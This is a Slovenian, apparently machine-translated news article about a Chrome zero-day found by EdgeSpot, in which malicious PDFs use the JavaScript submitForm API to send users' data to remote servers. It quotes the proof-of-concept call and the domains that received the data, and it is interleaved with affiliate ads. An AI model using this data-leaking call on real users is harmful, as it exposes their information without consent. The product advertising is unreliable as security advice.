- EdgeSpot je odkril intrigantno nič-dnevno ranljivost, ki izkorišča dokumente PDF v Chromu.
- To ranljivost vam lahko škoduje z zbiranjem občutljivih podatkov v računalniku.
- Raziščite našo Stran v spletu in oblaku za več informacij o drugih orodjih in storitvah.
- Če vas zanimajo brskalniki, vam v našem ponujamo veliko informacij o njih Središče brskalnikov.
Z Adobe Acrobat Reader naredite vse svoje dokumente dostopnimi in varnimi. To orodje za upravljanje dokumentov vam bo omogočilo tudi e-podpisovanje in ustvarjanje uradnih obrazcev, da boste prihranili čas pri delu. Nabavite ga za svoj računalnik in lahko boste:
- Odprite, natisnite in uredite vse datoteke PDF in druge vrste datotek
- Lažje izpolnite obrazce PDF
- Najpomembnejši dokumenti naj bodo šifrirani
Pridobite vse aplikacije po posebni ceni!
Svetovna programska oprema za upravljanje dokumentov št. 1 je zdaj po ugodni ceni, zato pohitite!
Storitev za odkrivanje izkoriščanja EdgeSpot je odkrila zanimivo Chrome nič-dnevna ranljivost, ki izkorišča dokumente PDF.
Ranljivost omogoča napadalcem, da zbiranje občutljivih podatkov z uporabo zlonamernih dokumentov PDF, odprtih v Chromu.
Takoj, ko žrtev odpre ustrezne datoteke PDF v brskalniku Google Chrome, zlonamerni program začne delovati v ozadju z zbiranjem uporabniških podatkov.
Podatki se nato posredujejo oddaljenemu strežniku, ki ga nadzirajo hekerji. Morda se sprašujete, katere podatke vsrkajo napadalci, v vašem računalniku ciljajo na naslednje podatke:
- IP naslov
- Celotna pot datoteke PDF v sistemu
- Različice OS in Chrome
Pazite se datotek PDF z zlonamerno programsko opremo
Strokovnjaki opažen da je ena od dveh domen readnotify [.] com ali burpcollaborator [.] net je prejemal podatke.
Razkrili so, da napadalci uporabljajo this.submitForm () PDF Javascript API za zbiranje občutljivih informacij uporabnikov.
Preizkusili smo ga z minimalnim PoC, preprostim API klicem this.submitForm (‘ http://google.com/test’) bo Google Chrome poslal osebne podatke na google.com.
To napako v Chromu sta izkoriščala dva različna nabora zlonamernih datotek PDF, ki sta bili v obtoku oktobra 2017 oziroma septembra 2018.
Zlasti lahko zbrani podatki v prihodnosti uporabijo za natančnejšo nastavitev napadov. Poročila kažejo, da je bila prva serija datotek zbrana s pomočjo storitve sledenja PDF ReadNotify.
Uporabniki lahko s pomočjo storitve spremljajo uporabniške poglede. EdgeSpot ni razkril nobenih podrobnosti o naravi drugega sklopa datotek PDF.
Hitri nasvet: Spremenite brskalnik v Opera
V teh nemirnih časih nas na vsakem koraku napadajo zlonamerna programska oprema, lažno predstavljanje in trojanci, zato moramo biti veliko bolj pozorni in zaščiteni.
Ker je to težava, značilna za Chrome, se tej grožnji in vsem ostalim lahko izognete z varnostno usmerjenim brskalnikom, kot je Opera.
Ta brskalnik ima vgrajen blokator oglasov, ki ne odstrani le takšnih motenj, temveč tudi blokira analitične skripte, slikovne pike za sledenje in metode za zbiranje vaših podatkov.
In če želite biti popolnoma prepričani, da se izogibate nevarnosti, pojdite za vgrajeno VPN storitev, ki je 100% brezplačna za neomejen čas.
Opera
Opera ponuja popolno zaščito pred grožnjami z vgrajenim zaviralcem oglasov in storitev VPN brezplačno!
Obiščite spletno mesto
Kako lahko ostanem zaščiten pred ranljivostmi PDF?
Prenesite Adobe Acrobat PRO
Pri ravnanju z datotekami PDF se Adobe in Chrome dobro ujemata. Z namestitvijo razširitve Adobe za Chrome lahko PDF-je pregledate in z njimi upravljate po svojih željah, ne da bi zapustili svoj najljubši brskalnik.
Kljub svoji robustni strukturi zlonamerne programske opreme, skrite v datotekah PDF, morda ne bo mogoče zaznati, če uporabljate standardno različico programa Reader.
Priporočljiva je profesionalna različica, ki zagotavlja vašo zaščito in varuje vaše podatke pred hekerji.
Čeprav ni brezplačna, je cena, ki jo boste plačali, za množico dodatnih funkcij, ki jih boste uživali, vključno z večjo varnostjo datotek PDF.
Vključen je tudi 7-dnevni brezplačni preskus, tako da lahko pred nakupom poskusite celotno izkušnjo Pro.
Adobe Acrobat PRO
Izogibajte se zlonamerni programski opremi s prenosom programa Adobe Acrobat PRO. Ima veliko več funkcij kot brezplačna različica in varuje vaše podatke.
Obiščite spletno mesto
Če želite biti varni med brskanjem po internetu, boste morali dobiti popolnoma namensko orodje za zaščito vašega omrežja. Zdaj namestite zasebni dostop do interneta in se zaščitite. Zaščiti računalnik pred napadi med brskanjem, prikrije vaš naslov IP in blokira neželen dostop.
Storitev za odkrivanje izkoriščanja EdgeSpot je želela uporabnike Chroma opozoriti na morebitna tveganja, ker popravek v bližnji prihodnosti ni bil izdan.
EdgeSpot je lani o ranljivosti poročal Googlu, podjetje pa je obljubo objavilo popravek konec aprila.
Vendar lahko razmislite o uporabi začasne rešitve težave z lokalnim ogledom prejetih dokumentov PDF z drugo aplikacijo bralnika.
Dokumente PDF lahko v Chromu odprete tudi tako, da odklopite sisteme od interneta.
Pogosto zastavljena vprašanja
Ja, res je. Če pa želite širši izbor, raziščite naše najboljše izbire za Chromezasebnost razširitve v ta popoln vodnik.
Ttukaj je veliko razširitev, ki omogočajo PDF-ji obravnavati. Preveri iz našega odličen vodnik o najboljših razširitvah PDF za Chrome.
Ne, lahko pa ga hitro aktivirate. Tukaj je naš celovit vodnik o tem, kako v Chromu omogočiti generator kode QR.
